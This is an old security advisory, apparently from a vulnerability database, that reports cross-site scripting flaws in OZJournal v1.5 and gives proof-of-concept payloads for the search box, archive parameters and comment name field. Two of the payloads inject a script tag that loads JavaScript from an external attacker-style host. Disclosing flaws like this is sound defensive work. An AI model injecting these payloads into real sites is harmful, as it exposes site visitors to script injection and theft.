Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13737
HistoryAug 03, 2006 - 12:00 a.m.

OZJournal v1.5 - XSS

2006-08-0300:00:00
vulners.com
12
JSON

OZJournal v1.5

Homepage:
http://ozjournals.awardspace.com/index.php

Affected files:
search input box
index.php
viewing archives
show comment page

XSS vulnerability via search input box:

Data isn't properly sanatized before being displayed. For a PoC in the search input box put: <script>alert('Hello')</script>. A full path disclosure error also will occur with this example due to functions.php.

Warning: preg_match(): Unknown modifier 'c' in /home/www/site/functions.php on line 570

XSS vuln viewing archives by month via m variable.

PoC:

http://example.com/index.php?show=archives&amp;y=2006&amp;m=&lt;script&#37;20src=http://www.youfucktard.com/xss.js&gt;&lt;/script&gt;

XSS vuln viewing archives by category via c variable:

http://example.com/index.php?show=archives&amp;c=http://ozjournals.awardspace.com/index.php?show=archives&amp;c=&lt;script&#37;20src=http://www.youfucktard.com/xss.js&gt;&lt;/script&gt;

XSS vuln after submitting a comment.

Data in the input name box isn't sanatized on the show post comments screen after submitting a comment.

However, when displaying comments in the journal everything is properly sanatized and filtered. For a PoC

in the name input box put:

<script>alert('Hello')</script>

JSON